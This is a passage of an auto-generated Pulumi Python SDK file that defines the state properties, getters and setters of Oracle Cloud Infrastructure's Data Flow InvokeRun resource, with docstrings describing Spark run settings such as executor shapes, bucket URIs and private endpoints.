The input used for spark-submit command. For more details see https://spark.apache.org/docs/latest/submitting-applications.html#launching-applications-with-spark-submit. Supported options include ``--class``, ``--file``, ``--jars``, ``--conf``, ``--py-files``, and main application file with arguments. Example: ``--jars oci://path/to/a.jar,oci://path/to/b.jar --files oci://path/to/a.json,oci://path/to/b.csv --py-files oci://path/to/a.py,oci://path/to/b.py --conf spark.sql.crossJoin.enabled=true --class org.apache.spark.examples.SparkPi oci://path/to/main.jar 10`` Note: If execute is specified together with applicationId, className, configuration, fileUri, language, arguments, parameters during application create/update, or run create/submit, Data Flow service will use derived information from execute input only.
"""
return pulumi.get(self, "execute")
@execute.setter
def execute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "execute", value)
@property
@pulumi.getter(name="executorShape")
def executor_shape(self) -> Optional[pulumi.Input[str]]:
"""
The VM shape for the executors. Sets the executor cores and memory.
"""
return pulumi.get(self, "executor_shape")
@executor_shape.setter
def executor_shape(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "executor_shape", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="logsBucketUri")
def logs_bucket_uri(self) -> Optional[pulumi.Input[str]]:
"""
An Oracle Cloud Infrastructure URI of the bucket where the Spark job logs are to be uploaded. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "logs_bucket_uri")
@logs_bucket_uri.setter
def logs_bucket_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logs_bucket_uri", value)
@property
@pulumi.getter(name="metastoreId")
def metastore_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of Oracle Cloud Infrastructure Hive Metastore.
"""
return pulumi.get(self, "metastore_id")
@metastore_id.setter
def metastore_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "metastore_id", value)
@property
@pulumi.getter(name="numExecutors")
def num_executors(self) -> Optional[pulumi.Input[int]]:
"""
The number of executor VMs requested.
"""
return pulumi.get(self, "num_executors")
@num_executors.setter
def num_executors(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "num_executors", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]]]:
"""
An array of name/value pairs used to fill placeholders found in properties like `Application.arguments`. The name must be a string of one or more word characters (a-z, A-Z, 0-9, _). The value can be a string of 0 or more characters of any kind. Example: [ { name: "iterations", value: "10"}, { name: "input_file", value: "mydata.xml" }, { name: "variable_x", value: "${x}"} ]
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="sparkVersion")
def spark_version(self) -> Optional[pulumi.Input[str]]:
"""
The Spark version utilized to run the application. This value may be set if applicationId is not since the Spark version will be taken from the associated application.
"""
return pulumi.get(self, "spark_version")
@spark_version.setter
def spark_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "spark_version", value)
@property
@pulumi.getter(name="warehouseBucketUri")
def warehouse_bucket_uri(self) -> Optional[pulumi.Input[str]]:
"""
An Oracle Cloud Infrastructure URI of the bucket to be used as default warehouse directory for BATCH SQL runs. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "warehouse_bucket_uri")
@warehouse_bucket_uri.setter
def warehouse_bucket_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "warehouse_bucket_uri", value)
@pulumi.input_type
class _InvokeRunState:
def __init__(__self__, *,
application_id: Optional[pulumi.Input[str]] = None,
archive_uri: Optional[pulumi.Input[str]] = None,
arguments: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
asynchronous: Optional[pulumi.Input[bool]] = None,
class_name: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
configuration: Optional[pulumi.Input[Mapping[str, Any]]] = None,
data_read_in_bytes: Optional[pulumi.Input[str]] = None,
data_written_in_bytes: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
driver_shape: Optional[pulumi.Input[str]] = None,
execute: Optional[pulumi.Input[str]] = None,
executor_shape: Optional[pulumi.Input[str]] = None,
file_uri: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
language: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
logs_bucket_uri: Optional[pulumi.Input[str]] = None,
metastore_id: Optional[pulumi.Input[str]] = None,
num_executors: Optional[pulumi.Input[int]] = None,
opc_request_id: Optional[pulumi.Input[str]] = None,
owner_principal_id: Optional[pulumi.Input[str]] = None,
owner_user_name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]]] = None,
private_endpoint_dns_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
private_endpoint_id: Optional[pulumi.Input[str]] = None,
private_endpoint_max_host_count: Optional[pulumi.Input[int]] = None,
private_endpoint_nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
private_endpoint_subnet_id: Optional[pulumi.Input[str]] = None,
run_duration_in_milliseconds: Optional[pulumi.Input[str]] = None,
spark_version: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None,
total_ocpu: Optional[pulumi.Input[int]] = None,
warehouse_bucket_uri: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering InvokeRun resources.
:param pulumi.Input[str] application_id: The OCID of the associated application. If this value is set, then no value for the execute parameter is required. If this value is not set, then a value for the execute parameter is required, and a new application is created and associated with the new run.
:param pulumi.Input[str] archive_uri: An Oracle Cloud Infrastructure URI of an archive.zip file containing custom dependencies that may be used to support the execution a Python, Java, or Scala application. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[Sequence[pulumi.Input[str]]] arguments: The arguments passed to the running application as command line arguments. An argument is either a plain text or a placeholder. Placeholders are replaced using values from the parameters map. Each placeholder specified must be represented in the parameters map else the request (POST or PUT) will fail with a HTTP 400 status code. Placeholders are specified as `Service Api Spec`, where `name` is the name of the parameter. Example: `[ "--input", "${input_file}", "--name", "John Doe" ]` If "input_file" has a value of "mydata.xml", then the value above will be translated to `--input mydata.xml --name "John Doe"`
:param pulumi.Input[str] class_name: The class for the application.
:param pulumi.Input[str] compartment_id: (Updatable) The OCID of a compartment.
:param pulumi.Input[Mapping[str, Any]] configuration: The Spark configuration passed to the running process. See https://spark.apache.org/docs/latest/configuration.html#available-properties Example: { "spark.app.name" : "My App Name", "spark.shuffle.io.maxRetries" : "4" } Note: Not all Spark properties are permitted to be set. Attempting to set a property that is not allowed to be overwritten will cause a 400 status to be returned.
:param pulumi.Input[str] data_read_in_bytes: The data read by the run in bytes.
:param pulumi.Input[str] data_written_in_bytes: The data written by the run in bytes.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[str] display_name: A user-friendly name that does not have to be unique. Avoid entering confidential information. If this value is not specified, it will be derived from the associated application's displayName or set by API using fileUri's application file name.
:param pulumi.Input[str] driver_shape: The VM shape for the driver. Sets the driver cores and memory.
:param pulumi.Input[str] execute: The input used for spark-submit command. For more details see https://spark.apache.org/docs/latest/submitting-applications.html#launching-applications-with-spark-submit. Supported options include ``--class``, ``--file``, ``--jars``, ``--conf``, ``--py-files``, and main application file with arguments. Example: ``--jars oci://path/to/a.jar,oci://path/to/b.jar --files oci://path/to/a.json,oci://path/to/b.csv --py-files oci://path/to/a.py,oci://path/to/b.py --conf spark.sql.crossJoin.enabled=true --class org.apache.spark.examples.SparkPi oci://path/to/main.jar 10`` Note: If execute is specified together with applicationId, className, configuration, fileUri, language, arguments, parameters during application create/update, or run create/submit, Data Flow service will use derived information from execute input only.
:param pulumi.Input[str] executor_shape: The VM shape for the executors. Sets the executor cores and memory.
:param pulumi.Input[str] file_uri: An Oracle Cloud Infrastructure URI of the file containing the application to execute. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] language: The Spark language.
:param pulumi.Input[str] lifecycle_details: The detailed messages about the lifecycle state.
:param pulumi.Input[str] logs_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket where the Spark job logs are to be uploaded. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[str] metastore_id: The OCID of Oracle Cloud Infrastructure Hive Metastore.
:param pulumi.Input[int] num_executors: The number of executor VMs requested.
:param pulumi.Input[str] opc_request_id: Unique Oracle assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param pulumi.Input[str] owner_principal_id: The OCID of the user who created the resource.
:param pulumi.Input[str] owner_user_name: The username of the user who created the resource. If the username of the owner does not exist, `null` will be returned and the caller should refer to the ownerPrincipalId value instead.
:param pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]] parameters: An array of name/value pairs used to fill placeholders found in properties like `Application.arguments`. The name must be a string of one or more word characters (a-z, A-Z, 0-9, _). The value can be a string of 0 or more characters of any kind. Example: [ { name: "iterations", value: "10"}, { name: "input_file", value: "mydata.xml" }, { name: "variable_x", value: "${x}"} ]
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_endpoint_dns_zones: An array of DNS zone names. Example: `[ "app.examplecorp.com", "app.examplecorp2.com" ]`
:param pulumi.Input[str] private_endpoint_id: The OCID of a private endpoint.
:param pulumi.Input[int] private_endpoint_max_host_count: The maximum number of hosts to be accessed through the private endpoint. This value is used to calculate the relevant CIDR block and should be a multiple of 256. If the value is not a multiple of 256, it is rounded up to the next multiple of 256. For example, 300 is rounded up to 512.
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_endpoint_nsg_ids: An array of network security group OCIDs.
:param pulumi.Input[str] private_endpoint_subnet_id: The OCID of a subnet.
:param pulumi.Input[str] run_duration_in_milliseconds: The duration of the run in milliseconds.
:param pulumi.Input[str] spark_version: The Spark version utilized to run the application. This value may be set if applicationId is not since the Spark version will be taken from the associated application.
:param pulumi.Input[str] state: The current state of this run.
:param pulumi.Input[str] time_created: The date and time a application was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
:param pulumi.Input[str] time_updated: The date and time a application was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
:param pulumi.Input[int] total_ocpu: The total number of oCPU requested by the run.
:param pulumi.Input[str] warehouse_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket to be used as default warehouse directory for BATCH SQL runs. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
if application_id is not None:
pulumi.set(__self__, "application_id", application_id)
if archive_uri is not None:
pulumi.set(__self__, "archive_uri", archive_uri)
if arguments is not None:
pulumi.set(__self__, "arguments", arguments)
if asynchronous is not None:
pulumi.set(__self__, "asynchronous", asynchronous)
if class_name is not None:
pulumi.set(__self__, "class_name", class_name)
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if configuration is not None:
pulumi.set(__self__, "configuration", configuration)
if data_read_in_bytes is not None:
pulumi.set(__self__, "data_read_in_bytes", data_read_in_bytes)
if data_written_in_bytes is not None:
pulumi.set(__self__, "data_written_in_bytes", data_written_in_bytes)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if driver_shape is not None:
pulumi.set(__self__, "driver_shape", driver_shape)
if execute is not None:
pulumi.set(__self__, "execute", execute)
if executor_shape is not None:
pulumi.set(__self__, "executor_shape", executor_shape)
if file_uri is not None:
pulumi.set(__self__, "file_uri", file_uri)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if language is not None:
pulumi.set(__self__, "language", language)
if lifecycle_details is not None:
pulumi.set(__self__, "lifecycle_details", lifecycle_details)
if logs_bucket_uri is not None:
pulumi.set(__self__, "logs_bucket_uri", logs_bucket_uri)
if metastore_id is not None:
pulumi.set(__self__, "metastore_id", metastore_id)
if num_executors is not None:
pulumi.set(__self__, "num_executors", num_executors)
if opc_request_id is not None:
pulumi.set(__self__, "opc_request_id", opc_request_id)
if owner_principal_id is not None:
pulumi.set(__self__, "owner_principal_id", owner_principal_id)
if owner_user_name is not None:
pulumi.set(__self__, "owner_user_name", owner_user_name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if private_endpoint_dns_zones is not None:
pulumi.set(__self__, "private_endpoint_dns_zones", private_endpoint_dns_zones)
if private_endpoint_id is not None:
pulumi.set(__self__, "private_endpoint_id", private_endpoint_id)
if private_endpoint_max_host_count is not None:
pulumi.set(__self__, "private_endpoint_max_host_count", private_endpoint_max_host_count)
if private_endpoint_nsg_ids is not None:
pulumi.set(__self__, "private_endpoint_nsg_ids", private_endpoint_nsg_ids)
if private_endpoint_subnet_id is not None:
pulumi.set(__self__, "private_endpoint_subnet_id", private_endpoint_subnet_id)
if run_duration_in_milliseconds is not None:
pulumi.set(__self__, "run_duration_in_milliseconds", run_duration_in_milliseconds)
if spark_version is not None:
pulumi.set(__self__, "spark_version", spark_version)
if state is not None:
pulumi.set(__self__, "state", state)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if time_updated is not None:
pulumi.set(__self__, "time_updated", time_updated)
if total_ocpu is not None:
pulumi.set(__self__, "total_ocpu", total_ocpu)
if warehouse_bucket_uri is not None:
pulumi.set(__self__, "warehouse_bucket_uri", warehouse_bucket_uri)
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of the associated application. If this value is set, then no value for the execute parameter is required. If this value is not set, then a value for the execute parameter is required, and a new application is created and associated with the new run.
"""
return pulumi.get(self, "application_id")
@application_id.setter
def application_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "application_id", value)
@property
@pulumi.getter(name="archiveUri")
def archive_uri(self) -> Optional[pulumi.Input[str]]:
"""
An Oracle Cloud Infrastructure URI of an archive.zip file containing custom dependencies that may be used to support the execution a Python, Java, or Scala application. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "archive_uri")
@archive_uri.setter
def archive_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "archive_uri", value)
@property
@pulumi.getter
def arguments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The arguments passed to the running application as command line arguments. An argument is either a plain text or a placeholder. Placeholders are replaced using values from the parameters map. Each placeholder specified must be represented in the parameters map else the request (POST or PUT) will fail with a HTTP 400 status code. Placeholders are specified as `Service Api Spec`, where `name` is the name of the parameter. Example: `[ "--input", "${input_file}", "--name", "John Doe" ]` If "input_file" has a value of "mydata.xml", then the value above will be translated to `--input mydata.xml --name "John Doe"`
"""
return pulumi.get(self, "arguments")
@arguments.setter
def arguments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "arguments", value)
@property
@pulumi.getter
def asynchronous(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "asynchronous")
@asynchronous.setter
def asynchronous(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "asynchronous", value)
@property
@pulumi.getter(name="className")
def class_name(self) -> Optional[pulumi.Input[str]]:
"""
The class for the application.
"""
return pulumi.get(self, "class_name")
@class_name.setter
def class_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "class_name", value)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of a compartment.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter
def configuration(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
The Spark configuration passed to the running process. See https://spark.apache.org/docs/latest/configuration.html#available-properties Example: { "spark.app.name" : "My App Name", "spark.shuffle.io.maxRetries" : "4" } Note: Not all Spark properties are permitted to be set. Attempting to set a property that is not allowed to be overwritten will cause a 400 status to be returned.
"""
return pulumi.get(self, "configuration")
@configuration.setter
def configuration(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "configuration", value)
@property
@pulumi.getter(name="dataReadInBytes")
def data_read_in_bytes(self) -> Optional[pulumi.Input[str]]:
"""
The data read by the run in bytes.
"""
return pulumi.get(self, "data_read_in_bytes")
@data_read_in_bytes.setter
def data_read_in_bytes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_read_in_bytes", value)
@property
@pulumi.getter(name="dataWrittenInBytes")
def data_written_in_bytes(self) -> Optional[pulumi.Input[str]]:
"""
The data written by the run in bytes.
"""
return pulumi.get(self, "data_written_in_bytes")
@data_written_in_bytes.setter
def data_written_in_bytes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_written_in_bytes", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
A user-friendly name that does not have to be unique. Avoid entering confidential information. If this value is not specified, it will be derived from the associated application's displayName or set by API using fileUri's application file name.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="driverShape")
def driver_shape(self) -> Optional[pulumi.Input[str]]:
"""
The VM shape for the driver. Sets the driver cores and memory.
"""
return pulumi.get(self, "driver_shape")
@driver_shape.setter
def driver_shape(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "driver_shape", value)
@property
@pulumi.getter
def execute(self) -> Optional[pulumi.Input[str]]:
"""
The input used for spark-submit command. For more details see https://spark.apache.org/docs/latest/submitting-applications.html#launching-applications-with-spark-submit. Supported options include ``--class``, ``--file``, ``--jars``, ``--conf``, ``--py-files``, and main application file with arguments. Example: ``--jars oci://path/to/a.jar,oci://path/to/b.jar --files oci://path/to/a.json,oci://path/to/b.csv --py-files oci://path/to/a.py,oci://path/to/b.py --conf spark.sql.crossJoin.enabled=true --class org.apache.spark.examples.SparkPi oci://path/to/main.jar 10`` Note: If execute is specified together with applicationId, className, configuration, fileUri, language, arguments, parameters during application create/update, or run create/submit, Data Flow service will use derived information from execute input only.
"""
return pulumi.get(self, "execute")
@execute.setter
def execute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "execute", value)
@property
@pulumi.getter(name="executorShape")
def executor_shape(self) -> Optional[pulumi.Input[str]]:
"""
The VM shape for the executors. Sets the executor cores and memory.
"""
return pulumi.get(self, "executor_shape")
@executor_shape.setter
def executor_shape(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "executor_shape", value)
@property
@pulumi.getter(name="fileUri")
def file_uri(self) -> Optional[pulumi.Input[str]]:
"""
An Oracle Cloud Infrastructure URI of the file containing the application to execute. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "file_uri")
@file_uri.setter
def file_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "file_uri", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter
def language(self) -> Optional[pulumi.Input[str]]:
"""
The Spark language.
"""
return pulumi.get(self, "language")
@language.setter
def language(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "language", value)
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> Optional[pulumi.Input[str]]:
"""
The detailed messages about the lifecycle state.
"""
return pulumi.get(self, "lifecycle_details")
@lifecycle_details.setter
def lifecycle_details(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_details", value)
@property
@pulumi.getter(name="logsBucketUri")
def logs_bucket_uri(self) -> Optional[pulumi.Input[str]]:
"""
An Oracle Cloud Infrastructure URI of the bucket where the Spark job logs are to be uploaded. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "logs_bucket_uri")
@logs_bucket_uri.setter
def logs_bucket_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logs_bucket_uri", value)
@property
@pulumi.getter(name="metastoreId")
def metastore_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of Oracle Cloud Infrastructure Hive Metastore.
"""
return pulumi.get(self, "metastore_id")
@metastore_id.setter
def metastore_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "metastore_id", value)
@property
@pulumi.getter(name="numExecutors")
def num_executors(self) -> Optional[pulumi.Input[int]]:
"""
The number of executor VMs requested.
"""
return pulumi.get(self, "num_executors")
@num_executors.setter
def num_executors(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "num_executors", value)
@property
@pulumi.getter(name="opcRequestId")
def opc_request_id(self) -> Optional[pulumi.Input[str]]:
"""
Unique Oracle assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
"""
return pulumi.get(self, "opc_request_id")
@opc_request_id.setter
def opc_request_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "opc_request_id", value)
@property
@pulumi.getter(name="ownerPrincipalId")
def owner_principal_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of the user who created the resource.
"""
return pulumi.get(self, "owner_principal_id")
@owner_principal_id.setter
def owner_principal_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "owner_principal_id", value)
@property
@pulumi.getter(name="ownerUserName")
def owner_user_name(self) -> Optional[pulumi.Input[str]]:
"""
The username of the user who created the resource. If the username of the owner does not exist, `null` will be returned and the caller should refer to the ownerPrincipalId value instead.
"""
return pulumi.get(self, "owner_user_name")
@owner_user_name.setter
def owner_user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "owner_user_name", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]]]:
"""
An array of name/value pairs used to fill placeholders found in properties like `Application.arguments`. The name must be a string of one or more word characters (a-z, A-Z, 0-9, _). The value can be a string of 0 or more characters of any kind. Example: [ { name: "iterations", value: "10"}, { name: "input_file", value: "mydata.xml" }, { name: "variable_x", value: "${x}"} ]
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="privateEndpointDnsZones")
def private_endpoint_dns_zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
An array of DNS zone names. Example: `[ "app.examplecorp.com", "app.examplecorp2.com" ]`
"""
return pulumi.get(self, "private_endpoint_dns_zones")
@private_endpoint_dns_zones.setter
def private_endpoint_dns_zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "private_endpoint_dns_zones", value)
@property
@pulumi.getter(name="privateEndpointId")
def private_endpoint_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of a private endpoint.
"""
return pulumi.get(self, "private_endpoint_id")
@private_endpoint_id.setter
def private_endpoint_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_endpoint_id", value)
@property
@pulumi.getter(name="privateEndpointMaxHostCount")
def private_endpoint_max_host_count(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of hosts to be accessed through the private endpoint. This value is used to calculate the relevant CIDR block and should be a multiple of 256. If the value is not a multiple of 256, it is rounded up to the next multiple of 256. For example, 300 is rounded up to 512.
"""
return pulumi.get(self, "private_endpoint_max_host_count")
@private_endpoint_max_host_count.setter
def private_endpoint_max_host_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "private_endpoint_max_host_count", value)
@property
@pulumi.getter(name="privateEndpointNsgIds")
def private_endpoint_nsg_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
An array of network security group OCIDs.
"""
return pulumi.get(self, "private_endpoint_nsg_ids")
@private_endpoint_nsg_ids.setter
def private_endpoint_nsg_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "private_endpoint_nsg_ids", value)
@property
@pulumi.getter(name="privateEndpointSubnetId")
def private_endpoint_subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of a subnet.
"""
return pulumi.get(self, "private_endpoint_subnet_id")
@private_endpoint_subnet_id.setter
def private_endpoint_subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_endpoint_subnet_id", value)
@property
@pulumi.getter(name="runDurationInMilliseconds")
def run_duration_in_milliseconds(self) -> Optional[pulumi.Input[str]]:
"""
The duration of the run in milliseconds.
"""
return pulumi.get(self, "run_duration_in_milliseconds")
@run_duration_in_milliseconds.setter
def run_duration_in_milliseconds(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "run_duration_in_milliseconds", value)
@property
@pulumi.getter(name="sparkVersion")
def spark_version(self) -> Optional[pulumi.Input[str]]:
"""
The Spark version utilized to run the application. This value may be set if applicationId is not since the Spark version will be taken from the associated application.
"""
return pulumi.get(self, "spark_version")
@spark_version.setter
def spark_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "spark_version", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
The current state of this run.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
The date and time a application was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> Optional[pulumi.Input[str]]:
"""
The date and time a application was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
"""
return pulumi.get(self, "time_updated")
@time_updated.setter
def time_updated(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_updated", value)
@property
@pulumi.getter(name="totalOcpu")
def total_ocpu(self) -> Optional[pulumi.Input[int]]:
"""
The total number of oCPU requested by the run.
"""
return pulumi.get(self, "total_ocpu")
@total_ocpu.setter
def total_ocpu(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "total_ocpu", value)
@property
@pulumi.getter(name="warehouseBucketUri")
def warehouse_bucket_uri(self) -> Optional[pulumi.Input[str]]:
"""
An Oracle Cloud Infrastructure URI of the bucket to be used as default warehouse directory for BATCH SQL runs. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "warehouse_bucket_uri")
@warehouse_bucket_uri.setter
def warehouse_bucket_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "warehouse_bucket_uri", value)
class InvokeRun(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
application_id: Optional[pulumi.Input[str]] = None,
archive_uri: Optional[pulumi.Input[str]] = None,
arguments: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
